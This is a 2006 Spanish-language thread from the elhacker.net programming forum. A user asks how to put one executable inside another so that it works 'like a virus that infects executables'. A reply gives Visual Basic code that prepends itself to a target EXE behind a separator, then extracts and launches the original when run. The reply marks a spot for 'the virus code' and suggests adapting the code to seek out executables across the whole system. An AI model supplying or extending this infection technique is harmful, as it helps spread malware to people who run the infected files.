elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  arxivos binarios
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: arxivos binarios  (Leído 1,598 veces)
Lambda


Desconectado Desconectado

Mensajes: 371



Ver Perfil WWW
arxivos binarios
« en: 12 Abril 2006, 17:32 pm »

wenas tngo una duda ^_^

toy haciendo ujn programa k lee un arxivo binario, pero lo k quiero es insertar ese binario en el propio programa dl VB, o sea quiero meter un exe a otro exe para k el exe 2º me lo sake, algo como un  virus k infecta a los ejecutables, espero k me ayan entendido jaja


salu2


En línea

Hendrix
In The Kernel Land
Colaborador
***
Desconectado Desconectado

Mensajes: 2.276



Ver Perfil WWW
Re: arxivos binarios
« Respuesta #1 en: 12 Abril 2006, 17:56 pm »

Pasate por aki e intenta entender el kodigo.... ;) ;) ;)

Salu2

Hendrix



En línea

"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
Lambda


Desconectado Desconectado

Mensajes: 371



Ver Perfil WWW
Re: arxivos binarios
« Respuesta #2 en: 12 Abril 2006, 18:14 pm »

dnde esta el link ¬¬ xk no veo nada  :huh:xDDD

salu2
PD: alomejor no lo e pillao xDDD
En línea

Hendrix
In The Kernel Land
Colaborador
***
Desconectado Desconectado

Mensajes: 2.276



Ver Perfil WWW
Re: arxivos binarios
« Respuesta #3 en: 12 Abril 2006, 18:25 pm »

 :o :o :o :o xD xD xD tio, se me fue la olla...xD xD

http://foro.elhacker.net/index.php/topic,112661.0.html

Salu2

En línea

"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
NYlOn


Desconectado Desconectado

Mensajes: 842


OOOOHHHHHH, TARAGÜIIII xDDDDDD


Ver Perfil WWW
Re: arxivos binarios
« Respuesta #4 en: 13 Abril 2006, 02:55 am »

Espero que este codigo te sirva, lo hice hace un tiempo ya para experimentar. Funciona mas como binder, pero si tu objetivo es infectar EXEs lo podes modificar para que vaya buscando ejecutables por todo el sistema y un par de cosas mas.
Código:
Private Sub Form_Load()
   
    Dim Datos As String
    Dim Original As String
    Dim Yo As String
    Dim Result As String
   
    Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1 'Abrimos el mismo programa
        Yo = Input(LOF(1), 1) 'y ponemos el codigo en la variable 'Yo'
    Close #1
   
    Buff = Split(Yo, "----SEP----") 'Dividimos esa variable (espero que sepas como funciona el Split)
   
    If UBound(Buff) > 0 Then 'Si se pudo dividir en mas de 1 pedazo (la variable Yo)

        Result = Buff(1)
       
        Open "C:\Resultado.exe" For Binary As #2 'abrimos un exe nuevo para introducir los datos
            Put #2, , Result 'ponemos todo lo que hay DEBAJO del separador
        Close #2
       
        DoEvents
       
        Shell "C:\Resultado.exe" 'abrimos el programa (el original)
       
       
        MsgBox "Aca podemos poner el codigo del virus, o ponerlo al finall"
        Unload Me 'nos cerramos(optativo xD)
       
    Else 'si NO se pudo dividir, entonces es que no existe el separador. Lo creamos...
   
        Open "C:\nylon.exe" For Binary As #3 'Abrimos el programa a infectar
            Original = Input(LOF(3), 3) 'Guardamos el contenido en la variable 'Original'
        Close #3
       
        Datos = Yo & "----SEP----" & Original 'Esto es lo que vamos a introducir en el archivo a infectar (YO = Nuestro virus, SEP = Separador, Original = archivo verdadero (el que estamos infectando)
       
        Open "C:\ProgramaAInfectar.exe" For Binary As #4 'abrimos el programa a infectar (modificar esta linea)
            Put #4, , Datos 'metemos los datos que grabamos antes
        Close #4
   
    End If

End Sub

'Al final de todo el proceso, el programa quedaria asi:
'
'--------------------------
'Nuestro programa
'---SEPARADOR---
'Programa original
'--------------------------
'
'
'Entonces, cuando abrimos el programa infectado, se abre NUESTRO programa,
'este busca lo que hay debajo del separador y lo mete en un nuevo archivo,
'despues abrimos ese archivo y salimos.
'
'
' Un abrazo y suerte
'
'
'
'   .NYlOn.
'
'¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ END ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬




Saludos !.-
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines